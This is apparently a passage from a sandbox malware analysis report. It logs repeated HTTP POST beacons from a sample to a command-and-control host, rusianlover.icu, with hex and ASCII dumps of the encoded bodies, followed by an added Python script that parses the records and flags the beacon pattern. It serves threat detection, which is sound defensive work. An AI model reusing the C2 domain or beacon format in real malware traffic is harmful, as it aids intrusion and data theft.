42 43 35 34 32 43 39 32 45 37 35 32 41 31 32 44 43 46 32 35 36 41 42 38 30 39 31 32 44 39 32 38 42 37 43 42 41 36 31 32 31 39 38 31 38 41 30 46 34 31 35 39 42 32 44 44 32 34 42 43 46 39 41 39 36 37 43 44 39 45 36 37 36 45 43 39 46 31 34 46 41 46 38 32 35 46 31 45 45 37 42 45 39 46 36 46 44 45 44 32 38 43 37 35 34 31 30 31 34 34 32 32 37 32 37 31 46 30 31 31 35 33 43 41 30 44 45 31 31 43 39 32 46 45 46 33 34 35 46 42 42 41 37 44 35 46 46 39 35 34 43 33 45 45 34 38 33 33 43 34 42 30 45 45 36 38 39 32 45 38 41 33 32 43 46 31 39 44 38 31 36 45 
30 36 34 45 44 30 46 43 36 42 36 36 39 32 45 45 35 37 46 33 43 35 45 30 32 36 43 31 34 43 34 42 45 37 32 31 46 43 37 37 41 32 39 39 35 42 42 33 31 39 34 39 35 31 33 45 37 42 41 36 43 34 31 34 35 34 30 43 37 32 41 31 43 30 38 34 41 39 33 31 39 35 31 42 33 39 45 46 38 33 30 42 35 31 37 35 38 46 42 30 41 33 Data Ascii: wsokmi=384112FB8CE095B4EF74DF532C7FE54ADB003841B8784BD5A4&uoic=94543476&ywuswusq=47D9E19D19BC07E3BCA0BA719B1BE0F21EC6331040F98FCF240B34FF806D4C79611534ECA6A59DF39439FAF8EB134A2372BB7C0302A7832B7BBCE28B5697809D071553D156E96DBBE28F95B00E5AAC02C985A05343A4D5636C25758CB18864C58D83BC3F43E839282A8BEFE7F761F4A76C8BB36B50746F19106799F00206F8136623673C1ED8CCAE5E97499231F017EED6E44CC614D4BC542C92E752A12DCF256AB80912D928B7CBA61219818A0F4159B2DD24BCF9A967CD9E676EC9F14FAF825F1EE7BE9F6FDED28C75410144227271F01153CA0DE11C92FEF345FBBA7D5FF954C3EE4833C4B0EE6892E8A32CF19D816E064ED0FC6B6692EE57F3C5E026C14C4BE721FC77A2995BB31949513E7BA6C414540C72A1C084A931951B39EF830B51758FB0A3
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 653Cache-Control: no-cacheData Raw: 6b 75 6b 75 3d 66 62 62 64 62 66 30 36 33 35 66 39 31 37 30 36 63 30 34 63 39 33 39 30 39 38 32 66 33 64 37 35 63 33 64 64 64 66 26 69 71 65 6d 61 69 77 65 3d 32 33 38 30 34 38 34 32 26 6d 79 71 63 75 67 3d 44 42 39 43 37 33 36 30 33 37 45 37 35 44 35 45 43 41 39 41 33 37 42 42 45 45 34 42 39 39 44 46 30 46 42 38 44 42 31 32 38 34 45 30 45 44 32 34 36 39 32 41 42 41 39 30 33 46 31 31 44 31 45 39 31 32 39 33 36 33 35 37 44 30 30 36 38 45 31 38 36 41 44 37 39 35 39 46 35 30 31 34 31 33 43 30 42 36 36 42 45 32 45 39 35 37 35 35 43 37 31 44 42 45 35 34 41 32 43 33 41 30 38 33 32 36 42 37 33 34 38 33 38 37 33 44 34 36 43 38 41 38 30 38 42 41 36 39 30 33 33 43 35 42 30 38 34 32 44 44 33 35 38 31 38 46 33 36 46 33 43 32 33 35 43 42 34 32 44 34 31 36 41 43 35 34 35 44 46 31 45 34 34 43 34 31 42 31 38 32 43 44 31 44 33 35 30 35 36 32 37 43 35 46 35 45 32 37 37 42 33 37 38 42 39 38 41 37 46 30 33 39 33 30 44 34 39 37 46 33 38 41 45 43 31 30 46 38 36 33 44 39 34 39 34 46 43 42 39 31 44 37 34 33 35 44 44 39 44 37 44 42 46 33 30 34 44 35 37 31 30 30 33 32 38 30 43 32 38 37 41 46 36 45 45 36 38 42 36 45 42 36 35 45 31 37 42 32 41 45 45 30 35 33 35 38 35 42 42 33 39 31 35 37 34 36 42 32 46 34 37 41 31 38 33 44 39 44 31 41 43 45 44 33 30 42 30 39 36 31 37 39 38 43 46 41 32 37 30 45 39 30 46 35 33 37 42 39 31 35 35 39 36 32 44 43 35 43 45 42 33 46 41 32 32 33 33 33 39 38 37 33 34 39 33 44 38 34 42 46 35 33 33 45 41 46 34 45 33 33 34 37 30 39 38 38 38 38 38 43 43 32 32 45 31 46 41 32 41 46 38 35 39 42 38 31 37 41 44 41 37 41 37 43 34 39 37 33 30 41 42 30 30 42 30 46 31 45 43 38 36 33 31 41 42 43 44 41 38 46 45 36 32 36 46 30 42 42 30 37 36 36 45 44 38 39 45 41 38 34 32 41 46 33 31 42 36 36 
37 34 31 43 37 44 44 33 39 42 45 46 31 33 38 45 37 31 32 32 46 41 30 43 39 41 36 44 36 46 45 44 45 32 34 32 39 46 36 33 38 41 36 39 45 38 44 30 31 42 34 44 41 39 41 33 38 41 32 41 35 41 41 33 35 41 38 30 43 43 30 38 42 32 42 34 36 34 38 34 46 37 37 43 34 44 Data Ascii: kuku=fbbdbf0635f91706c04c9390982f3d75c3dddf&iqemaiwe=23804842&myqcug=DB9C736037E75D5ECA9A37BBEE4B99DF0FB8DB1284E0ED24692ABA903F11D1E912936357D0068E186AD7959F501413C0B66BE2E95755C71DBE54A2C3A08326B73483873D46C8A808BA69033C5B0842DD35818F36F3C235CB42D416AC545DF1E44C41B182CD1D3505627C5F5E277B378B98A7F03930D497F38AEC10F863D9494FCB91D7435DD9D7DBF304D571003280C287AF6EE68B6EB65E17B2AEE053585BB3915746B2F47A183D9D1ACED30B0961798CFA270E90F537B9155962DC5CEB3FA223339873493D84BF533EAF4E33470988888CC22E1FA2AF859B817ADA7A7C49730AB00B0F1EC8631ABCDA8FE626F0BB0766ED89EA842AF31B66741C7DD39BEF138E7122FA0C9A6D6FEDE2429F638A69E8D01B4DA9A38A2A5AA35A80CC08B2B46484F77C4D
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?pid=567 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 646Cache-Control: no-cacheData Raw: 6c 63 74 6b 62 73 6a 3d 32 32 30 39 31 38 33 35 26 6e 67 7a 73 6c 65 78 71 6a 3d 37 64 30 64 38 35 35 38 38 66 65 66 31 62 66 65 65 61 36 63 64 30 63 34 64 62 36 32 26 70 6b 66 61 76 3d 35 35 31 61 62 31 31 64 63 37 63 33 35 62 61 62 39 35 38 32 33 37 62 61 63 30 39 64 31 66 32 32 66 62 33 33 39 36 61 38 31 34 66 62 38 65 64 64 36 65 66 32 62 34 38 34 61 64 30 61 37 32 37 39 34 33 36 32 31 62 34 38 61 66 36 39 34 32 61 30 35 35 61 37 39 38 63 62 36 36 61 33 63 61 34 38 33 63 63 64 65 30 32 37 31 66 32 36 35 62 38 64 33 38 61 64 30 31 33 32 39 66 39 38 63 39 30 30 36 33 32 30 65 32 30 32 39 32 32 30 66 63 62 38 36 61 38 66 61 33 36 37 39 34 62 33 65 33 39 36 31 65 35 61 33 34 39 65 31 35 63 63 39 33 62 35 31 34 30 34 62 31 32 65 39 37 33 62 38 32 36 32 64 33 66 38 37 65 35 34 34 39 35 35 63 35 38 32 64 32 36 32 33 66 33 31 39 34 39 34 65 39 31 30 63 37 38 30 32 38 38 62 36 64 61 39 34 35 39 37 66 65 39 37 31 33 33 38 65 31 33 63 66 31 35 65 66 31 34 35 34 37 34 62 65 64 35 33 39 33 31 66 35 63 33 30 66 34 38 62 38 34 64 35 62 35 34 61 64 35 38 33 37 32 63 36 32 37 64 65 34 62 61 31 62 36 39 37 30 36 65 31 64 39 38 35 34 31 38 38 33 64 30 38 33 32 34 33 30 33 65 66 35 31 32 31 63 36 38 63 30 33 39 62 36 30 34 34 38 37 37 38 37 31 39 66 32 37 65 37 64 64 34 38 38 31 63 63 32 31 62 32 31 30 30 35 37 62 36 36 36 34 65 36 37 32 33 66 33 65 32 37 66 36 35 31 31 33 36 38 35 65 33 32 31 64 66 30 66 31 62 32 30 63 62 63 61 32 32 36 35 62 35 31 36 32 63 64 61 62 37 33 37 61 39 33 34 64 36 35 39 39 32 36 34 31 37 37 31 62 39 65 61 65 64 65 31 66 61 35 39 37 64 39 32 35 30 32 37 37 31 30 62 33 38 38 37 64 35 31 35 37 38 39 31 62 62 31 31 36 36 39 37 39 66 31 61 65 36 34 62 36 
38 35 35 65 35 64 32 63 36 65 36 38 39 62 63 64 34 66 62 39 35 64 37 34 33 65 32 61 64 61 65 66 35 63 34 62 39 62 65 62 34 32 66 34 35 33 65 37 30 35 65 63 35 62 39 31 32 34 62 31 31 62 35 30 38 30 31 61 65 32 64 36 33 65 65 34 62 31 64 39 32 34 Data Ascii: lctkbsj=22091835&ngzslexqj=7d0d85588fef1bfeea6cd0c4db62&pkfav=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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 7a 65 64 69 68 6d 6c 71 70 3d 32 34 36 32 31 31 39 37 26 62 69 6a 71 72 3d 31 63 36 35 36 38 63 30 62 35 62 65 38 31 35 38 35 61 34 66 61 64 38 65 35 38 39 38 33 63 63 66 36 34 38 32 35 30 62 30 66 33 33 32 34 64 33 61 35 31 62 31 34 38 26 64 6d 70 79 62 6b 6e 3d 31 34 36 32 34 41 34 39 41 41 33 45 44 43 37 46 32 44 41 34 37 39 35 33 37 30 46 35 38 33 39 39 35 43 46 44 38 33 35 31 41 45 30 41 35 31 43 37 33 30 38 43 34 36 46 41 34 37 32 34 41 34 38 30 32 46 42 31 46 32 42 34 46 42 39 46 35 42 31 44 35 34 45 45 45 34 39 41 44 42 43 30 31 36 45 31 30 46 30 45 32 45 37 36 43 45 39 32 45 39 46 46 42 45 38 31 33 39 36 37 43 43 34 34 32 41 39 42 39 46 30 37 32 44 36 38 32 38 39 45 44 45 44 35 39 35 39 32 43 32 38 31 34 37 43 33 39 44 32 41 34 37 30 37 37 30 46 45 30 30 35 44 39 33 34 32 30 35 34 37 35 37 42 38 44 31 35 42 35 34 46 42 37 41 43 45 37 43 43 35 33 38 32 35 46 31 32 38 35 35 41 45 46 34 32 38 35 44 34 39 35 45 44 35 38 45 39 44 39 33 45 38 30 42 36 35 41 32 39 31 35 43 36 34 33 39 33 32 33 46 32 42 45 32 43 32 33 45 44 39 38 32 30 35 34 33 46 39 31 43 44 45 30 34 37 31 44 43 37 37 34 34 39 43 39 44 31 36 44 34 35 36 46 42 32 30 46 39 42 44 37 34 41 44 31 39 35 35 31 37 31 39 46 33 31 45 46 44 31 30 33 32 42 32 38 36 38 31 46 37 46 46 42 33 41 36 34 30 42 30 37 42 33 43 45 30 33 37 31 41 42 43 35 30 38 38 30 46 39 31 41 46 41 32 39 36 32 32 44 31 44 43 36 45 38 41 36 39 38 34 36 39 37 30 45 37 35 37 30 45 39 42 46 32 33 38 33 33 37 32 45 41 45 43 36 32 35 35 44 35 45 31 43 39 35 45 44 45 42 32 31 38 39 45 36 35 33 32 35 32 45 41 31 41 30 33 42 45 31 37 30 32 36 31 45 39 41 37 32 33 34 35 41 31 35 43 31 32 46 42 38 36 44 36 38 31 31 42 35 46 31 43 33 33 37 46 34 42 44 
41 41 43 37 39 42 42 41 42 41 46 32 35 41 37 33 43 43 44 32 42 38 44 38 31 42 30 34 43 38 33 44 34 38 34 35 41 41 31 45 45 44 42 30 41 38 36 46 37 41 37 38 39 36 32 30 34 44 33 32 37 32 34 30 46 36 32 41 43 43 35 35 35 34 43 36 35 37 43 32 36 31 41 45 42 43 45 34 42 43 41 45 33 30 41 30 34 36 36 37 34 45 44 44 34 Data Ascii: zedihmlqp=24621197&bijqr=1c6568c0b5be81585a4fad8e58983ccf648250b0f3324d3a51b148&dmpybkn=14624A49AA3EDC7F2DA4795370F583995CFD8351AE0A51C7308C46FA4724A4802FB1F2B4FB9F5B1D54EEE49ADBC016E10F0E2E76CE92E9FFBE813967CC442A9B9F072D68289EDED59592C28147C39D2A470770FE005D9342054757B8D15B54FB7ACE7CC53825F12855AEF4285D495ED58E9D93E80B65A2915C6439323F2BE2C23ED9820543F91CDE0471DC77449C9D16D456FB20F9BD74AD19551719F31EFD1032B28681F7FFB3A640B07B3CE0371ABC50880F91AFA29622D1DC6E8A69846970E7570E9BF2383372EAEC6255D5E1C95EDEB2189E653252EA1A03BE170261E9A72345A15C12FB86D6811B5F1C337F4BDAAC79BBABAF25A73CCD2B8D81B04C83D4845AA1EEDB0A86F7A7896204D327240F62ACC5554C657C261AEBCE4BCAE30A046674EDD4
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9292886 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 655Cache-Control: no-cacheData Raw: 66 6b 76 61 66 3d 31 39 36 61 39 66 31 38 32 35 62 30 32 37 39 61 62 66 33 65 35 31 34 64 35 63 31 31 62 37 33 39 65 66 63 36 66 36 26 64 67 70 73 76 65 68 6b 74 3d 38 33 30 36 30 35 37 26 68 6f 62 69 70 63 6a 3d 35 38 66 31 35 33 33 62 63 38 33 66 62 32 38 33 66 65 64 32 34 63 66 37 36 64 65 38 37 62 63 62 65 39 36 36 39 36 62 35 63 30 61 38 34 32 30 63 37 38 37 63 35 30 30 63 34 64 63 63 61 30 62 39 39 66 61 33 30 39 38 63 34 62 32 34 35 61 36 66 30 33 31 66 66 61 38 35 39 31 64 66 64 61 63 37 37 37 61 37 33 30 35 61 61 65 36 66 38 61 39 34 62 66 62 62 62 35 35 62 63 36 32 66 64 65 65 65 35 36 35 33 66 32 37 66 34 63 35 32 66 66 66 31 66 30 33 65 30 64 63 63 38 66 39 34 33 63 35 36 31 39 36 32 30 31 39 32 39 32 37 64 37 63 37 66 31 33 30 33 34 62 33 34 65 63 33 63 34 30 32 31 33 39 35 62 63 33 37 31 65 63 65 64 63 37 65 31 36 61 66 64 65 31 39 35 63 34 35 63 64 63 38 66 64 61 63 34 64 37 61 35 35 32 36 66 65 33 64 63 31 62 64 38 37 65 36 33 61 39 38 66 66 31 32 63 37 32 65 63 38 32 35 65 62 61 39 35 38 35 31 38 62 33 38 31 33 63 38 39 31 63 32 61 39 37 34 34 30 39 35 34 37 62 31 65 62 32 65 32 35 37 37 37 30 63 64 33 36 39 65 64 37 31 34 62 32 63 62 37 33 61 32 34 31 66 34 64 30 62 36 31 65 64 36 34 65 32 33 31 32 34 30 63 38 64 61 66 36 66 33 34 61 65 30 37 32 33 66 64 39 36 63 61 39 38 31 39 39 64 31 64 62 30 34 30 35 35 35 66 31 66 66 33 63 63 37 65 34 35 61 38 63 39 64 33 33 31 66 34 32 39 64 39 31 39 63 64 65 30 37 62 34 66 32 31 61 35 63 64 31 34 66 37 61 36 38 35 31 39 32 63 37 38 64 37 38 63 37 37 63 35 38 66 66 34 30 61 33 62 34 38 32 36 34 36 37 61 66 34 63 36 33 32 37 38 65 37 63 32 61 39 34 37 30 63 61 30 66 37 30 38 36 34 37 34 39 65 61 38 66 66 
35 32 32 33 66 32 36 62 64 62 65 63 32 64 39 65 30 34 33 61 32 30 37 36 62 66 62 61 35 38 65 35 32 63 36 32 32 33 39 61 65 32 32 63 61 61 30 34 39 32 35 64 31 38 36 37 33 35 31 63 37 37 35 30 33 65 34 33 32 34 37 34 33 31 34 64 32 36 30 63 39 32 62 34 65 30 62 63 37 61 39 33 Data Ascii: fkvaf=196a9f1825b0279abf3e514d5c11b739efc6f6&dgpsvehkt=8306057&hobipcj=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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 641Cache-Control: no-cacheData Raw: 73 6b 63 75 3d 61 66 39 61 30 30 39 64 31 31 32 38 31 65 65 61 39 30 32 32 39 33 64 36 39 31 26 71 67 77 6d 63 73 69 79 3d 39 38 31 31 38 34 30 36 26 75 6f 69 63 77 71 3d 34 62 65 36 34 38 66 30 36 62 33 64 31 62 36 37 30 30 35 39 38 32 39 66 63 37 32 38 64 66 35 63 65 65 63 33 31 63 31 37 35 64 65 61 63 33 31 32 37 66 39 38 65 39 63 62 30 61 36 30 65 32 36 66 36 63 36 63 31 38 38 34 33 39 35 39 31 32 61 64 38 64 62 32 36 65 62 64 39 31 39 36 30 32 33 64 39 35 62 35 39 64 61 38 62 65 62 38 35 35 62 62 62 30 63 37 30 32 33 32 34 66 37 63 66 65 66 62 66 36 36 65 31 34 65 35 32 62 34 34 37 66 65 36 34 64 62 32 63 64 34 30 36 34 64 34 31 65 39 61 31 61 38 37 39 30 30 66 64 62 62 64 38 33 36 32 61 62 36 62 33 64 39 65 39 65 30 32 36 63 34 30 32 37 37 30 64 61 64 62 65 32 30 35 63 38 61 66 61 65 38 64 36 61 38 31 34 63 66 30 64 37 37 32 34 34 61 36 30 62 34 35 63 32 37 62 62 61 62 65 61 32 62 36 62 33 65 38 61 36 30 64 66 37 33 33 39 65 62 32 66 62 30 37 31 36 32 34 64 65 38 61 33 61 33 34 38 33 64 64 64 34 32 38 30 64 33 33 65 32 31 36 63 33 30 62 39 34 35 61 36 30 32 64 65 65 64 36 65 66 30 62 32 65 36 38 61 31 31 30 38 33 34 30 35 63 64 30 36 30 65 66 62 31 64 64 61 33 30 30 64 38 66 65 36 36 64 62 63 31 35 32 64 34 38 35 63 30 62 30 37 66 64 32 64 34 36 64 63 30 65 33 66 30 36 32 37 39 39 39 39 31 64 33 33 38 30 62 63 32 37 65 32 35 33 65 34 35 31 31 35 31 32 31 64 38 37 32 37 61 31 31 61 30 31 33 66 39 32 66 33 36 65 30 66 35 38 33 65 65 64 64 36 37 33 62 33 61 36 66 32 37 62 36 32 39 31 32 35 34 38 33 35 36 61 32 61 39 30 36 64 38 31 35 66 39 62 33 33 34 62 66 31 65 38 33 31 61 62 37 64 35 30 35 32 62 32 65 35 61 63 36 61 33 37 30 34 39 31 66 64 62 30 38 37 61 35 61 39 38 
32 32 30 63 61 63 39 63 64 62 36 63 38 39 65 35 32 32 30 63 32 61 37 33 61 33 30 30 66 34 39 36 31 33 37 39 39 62 33 61 63 62 38 36 34 66 31 35 38 33 65 64 65 65 65 36 32 38 66 61 37 65 64 30 65 66 39 61 32 35 30 32 34 66 Data Ascii: skcu=af9a009d11281eea902293d691&qgwmcsiy=98118406&uoicwq=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
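Every POST listed above has the same shape: the IE11 Trident/7.0 User-Agent, Cache-Control: no-cache, a body of roughly 635-692 bytes to /forum/logout.php (with or without a throwaway query string) on rusianlover.icu, and exactly three form fields with random lowercase names, one carrying a 7-8 digit decimal and the other two carrying hex blobs (one short, one long). The following Python is an added example and not part of the Joe Sandbox report: it parses a record in the run-together layout shown above, recovers the body from the "Data Raw" hex dump, checks the decoded length against Content-Length, and scores those beacon indicators. The hex excerpt is copied from the first record and truncated after the start of the third field; the record wrapper around it, its Content-Length of 78, and the benign comparison request are constructed for the example.

```python
"""Added example (not from the report): decode 'HTTP traffic detected' records,
recover the POST body from the 'Data Raw' hex dump and fingerprint the beacon
shape seen above (three random-named fields: one 7-8 digit counter, two hex blobs)."""
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl

# Hex copied from the first record above, truncated after the start of the third field.
RAW_EXCERPT = (
    "7a 65 6a 6f 74 3d 35 39 39 37 35 34 38 35 26 62 69 70 77 64 6b 72 3d 43 45 33 42 "
    "36 34 37 42 32 45 41 35 41 36 31 43 31 31 37 31 46 30 32 44 39 37 34 32 26 64 6d "
    "76 65 6e 77 66 6f 78 3d 35 46 33 30 41 46 45 41 30 39 43 44 38 33 42 38"
)
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Constructed record in the report's run-together layout; only the hex above is from
# the page, so Content-Length is the excerpt's 78 bytes rather than the report's 646.
REPORT_RECORD = (
    "Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9885598 HTTP/1.1"
    "Content-Type: application/x-www-form-urlencoded"
    f"User-Agent: {IE11_UA}"
    "Host: rusianlover.icuContent-Length: 78Cache-Control: no-cache"
    f"Data Raw: {RAW_EXCERPT} Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox"
)
# Constructed benign login POST for comparison (hex generated, not from the page).
BENIGN_BODY = b"user=alice&pass=secret"
BENIGN_RECORD = (
    "Source: global trafficHTTP traffic detected: POST /login HTTP/1.1"
    "Content-Type: application/x-www-form-urlencoded"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/85.0"
    f"Host: intranet.exampleContent-Length: {len(BENIGN_BODY)}"
    f"Data Raw: {BENIGN_BODY.hex(' ')} Data Ascii: {BENIGN_BODY.decode()}"
)

HEADERS = ("Content-Type", "User-Agent", "Host", "Content-Length", "Cache-Control")
_REQ_RE = re.compile(r"HTTP traffic detected: ([A-Z]+) (\S+) HTTP/1\.[01]")
# Header values run straight into the next header name, so stop lazily at any known
# name or at the start of the hex dump.
_HDR_RE = re.compile(
    r"(%s): (.*?)(?=%s|Data Raw:)"
    % ("|".join(HEADERS), "|".join(h + ":" for h in HEADERS))
)
_RAW_RE = re.compile(r"Data Raw: (.*?)(?:Data Ascii:|$)", re.S)


@dataclass
class HttpRecord:
    method: str
    path: str
    headers: dict
    body: bytes
    fields: list  # decoded application/x-www-form-urlencoded (name, value) pairs

    @property
    def length_ok(self) -> bool:
        """Declared Content-Length matches the decoded dump (False if the dump is truncated)."""
        return self.headers.get("Content-Length") == str(len(self.body))


def parse_record(rec: str) -> HttpRecord:
    req = _REQ_RE.search(rec)
    if not req:
        raise ValueError("no request line in record")
    headers = {name: value for name, value in _HDR_RE.findall(rec)}
    raw = _RAW_RE.search(rec)
    body = bytes.fromhex(raw.group(1)) if raw else b""  # fromhex ignores the spaces
    fields = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return HttpRecord(req.group(1), req.group(2), headers, body, fields)


def classify(value: str) -> str:
    """Shape of one form value: 7-8 digit decimal counter, even-length hex blob, or other.
    Digits are tested first because a pure-decimal value is also valid hex."""
    if re.fullmatch(r"\d{7,8}", value):
        return "counter"
    if re.fullmatch(r"[0-9A-Fa-f]+", value) and len(value) % 2 == 0:
        return "hex"
    return "other"


def beacon_indicators(rec: HttpRecord) -> list:
    """Indicators matching the rusianlover.icu POSTs above. Host and path are
    campaign-specific; the body shape is the part worth keeping when the C2 moves."""
    hits = []
    if rec.method == "POST" and rec.path.split("?", 1)[0] == "/forum/logout.php":
        hits.append("path:/forum/logout.php")
    if rec.headers.get("Host") == "rusianlover.icu":
        hits.append("host:rusianlover.icu")
    if rec.headers.get("User-Agent") == IE11_UA:
        hits.append("ua:ie11-trident")
    if rec.headers.get("Cache-Control") == "no-cache":
        hits.append("cache-control:no-cache")
    shape = sorted(classify(v) for _, v in rec.fields)
    random_keys = all(re.fullmatch(r"[a-z]{4,9}", k) for k, _ in rec.fields)
    if shape == ["counter", "hex", "hex"] and random_keys:
        hits.append("body:counter+2hex,random-keys")
    return hits


def is_suspected_beacon(rec: HttpRecord) -> bool:
    """Require the body shape plus at least two header or URL indicators."""
    hits = beacon_indicators(rec)
    return any(h.startswith("body:") for h in hits) and len(hits) >= 3


if __name__ == "__main__":
    for label, text in (("report", REPORT_RECORD), ("benign", BENIGN_RECORD)):
        r = parse_record(text)
        print(label, r.path, r.length_ok, beacon_indicators(r), is_suspected_beacon(r))
```

The length check matters when working from a report rather than a pcap: a dump cut by the report renderer decodes to a shorter body than the declared Content-Length, and the third field then looks like a short hex blob instead of the long one, so the body-shape indicator should be trusted only when length_ok is True.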
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=8085154 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 671Cache-Control: no-cacheData Raw: 65 6f 73 63 67 71 3d 39 32 37 39 39 32 35 34 26 67 73 79 6b 71 63 69 75 3d 32 39 41 35 41 46 39 32 33 45 43 33 36 36 33 44 46 39 46 34 46 31 36 36 33 33 39 30 38 31 39 46 31 39 41 43 46 37 32 39 44 46 31 33 32 42 42 31 30 41 44 30 34 42 32 38 26 69 77 65 73 3d 64 35 34 66 33 32 31 62 36 31 61 35 30 30 64 61 32 34 30 31 65 38 30 34 61 36 38 31 36 61 38 36 37 61 62 39 62 37 63 37 65 37 64 36 62 33 65 34 64 66 30 31 30 37 32 64 38 39 64 31 62 39 37 63 65 31 61 62 61 32 64 36 36 33 30 64 33 38 32 62 35 66 30 38 38 64 34 38 33 66 62 64 34 34 34 61 38 65 34 34 30 65 61 64 63 34 38 33 65 32 62 36 61 31 64 36 31 36 34 65 39 34 39 39 64 61 34 61 33 65 33 63 30 39 38 34 64 32 65 64 62 63 66 62 33 35 62 66 35 38 39 30 61 39 33 65 30 32 38 61 39 33 30 62 61 33 36 39 35 30 32 35 32 33 62 37 65 36 35 62 66 65 32 38 63 33 66 35 63 36 30 63 32 63 64 31 31 30 65 66 34 39 34 61 33 37 64 65 39 31 61 33 36 64 64 31 65 63 36 62 66 61 32 63 32 34 35 65 63 64 65 37 63 30 65 38 61 32 61 35 30 30 33 62 36 32 34 36 37 63 35 66 65 63 30 36 32 62 63 62 31 63 37 38 61 65 38 66 64 32 38 34 66 61 66 39 32 39 32 66 30 31 64 62 31 65 65 38 30 64 62 36 61 38 37 35 38 65 65 61 33 64 34 38 34 38 39 63 36 34 39 35 66 62 37 39 31 30 64 66 61 33 39 39 61 63 32 32 61 39 39 63 39 39 37 62 33 35 36 33 38 34 64 63 31 35 39 30 37 34 31 64 35 62 66 38 38 65 62 31 63 31 62 65 65 35 32 32 65 65 62 35 30 36 34 31 39 63 66 38 37 30 35 31 35 33 62 37 65 31 64 64 63 38 36 36 35 36 66 32 35 34 61 36 31 64 64 64 38 35 65 33 38 38 39 61 35 39 37 66 33 63 31 63 34 62 31 35 64 37 33 37 38 39 39 31 39 65 38 62 62 38 37 65 31 37 36 36 35 35 37 39 65 33 61 36 35 35 37 64 61 65 30 61 37 36 37 34 33 34 39 36 64 33 64 63 
31 61 61 34 65 30 36 38 62 36 34 39 63 32 64 65 62 30 61 30 37 66 34 62 63 39 36 36 65 36 35 32 32 65 61 32 38 35 30 32 33 36 38 38 34 30 65 35 31 62 34 34 34 33 66 65 32 65 38 35 63 32 65 31 32 37 34 62 64 39 39 36 64 31 64 34 66 38 30 65 61 33 30 65 30 32 30 64 39 65 62 35 32 38 39 33 31 34 30 30 62 62 35 66 39 36 66 31 Data Ascii: eoscgq=92799254&gsykqciu=29A5AF923EC3663DF9F4F1663390819F19ACF729DF132BB10AD04B28&iwes=[...]
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=5263631 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 669Cache-Control: no-cacheData Raw: 6d 79 71 63 3d 30 65 61 31 64 65 61 62 37 63 65 34 62 66 32 39 31 35 31 65 33 63 35 37 64 33 34 61 34 66 65 66 33 30 39 31 34 34 35 38 30 62 30 64 35 64 63 31 38 62 37 34 61 31 26 6b 75 6b 75 6b 75 6b 75 3d 38 30 34 34 34 39 37 34 26 6f 63 77 6b 65 73 3d 42 33 46 38 39 35 35 39 32 41 44 34 30 31 43 31 41 44 38 38 45 45 34 42 45 36 30 46 31 30 30 46 45 43 35 46 36 30 34 30 38 41 31 31 36 44 45 33 45 32 31 44 46 37 36 39 45 34 43 37 41 36 33 43 41 36 44 38 39 44 39 35 30 42 32 33 30 39 37 41 45 44 36 34 38 34 42 34 39 38 43 45 45 46 45 31 36 35 34 37 32 37 39 30 36 42 43 34 37 31 31 32 44 37 46 43 35 46 31 30 45 33 45 37 41 45 45 39 32 34 33 42 33 42 35 43 34 42 41 45 39 39 39 37 34 41 44 43 31 31 36 34 33 32 30 42 43 39 41 35 38 45 31 44 45 37 37 38 39 41 36 36 46 46 32 32 45 32 31 31 31 45 31 39 39 46 42 32 42 33 41 30 30 36 39 32 31 35 43 43 31 43 34 33 43 31 30 46 32 32 46 43 43 37 32 36 43 33 39 30 43 33 44 36 35 41 46 36 46 37 32 46 44 33 42 31 35 37 33 42 39 35 34 39 30 44 30 37 43 37 30 35 44 46 45 38 42 30 38 44 45 46 46 32 44 31 43 39 31 39 45 42 31 44 33 44 34 34 43 46 38 38 31 31 45 31 42 31 39 32 32 33 35 43 41 45 37 38 37 35 44 46 33 42 41 34 35 34 30 35 43 43 46 46 39 33 32 33 38 44 30 38 37 36 36 30 41 37 46 44 34 30 45 38 44 43 36 41 33 31 44 33 39 31 32 43 44 42 46 37 32 38 46 45 30 45 44 43 37 38 37 46 41 34 39 33 46 38 38 31 46 34 39 39 33 41 31 46 31 44 35 34 44 42 36 35 33 36 36 46 43 44 36 32 42 33 38 34 35 32 32 39 36 36 45 34 30 33 37 31 44 43 42 31 44 34 35 35 42 37 33 46 46 34 36 39 36 43 35 36 39 37 45 46 32 39 36 34 44 44 33 42 36 43 36 32 45 30 39 41 36 31 42 37 34 31 33 30 44 43 30 41 35 45 45 44 38 45 41 34 33 33 33 33 38 39 33 37 
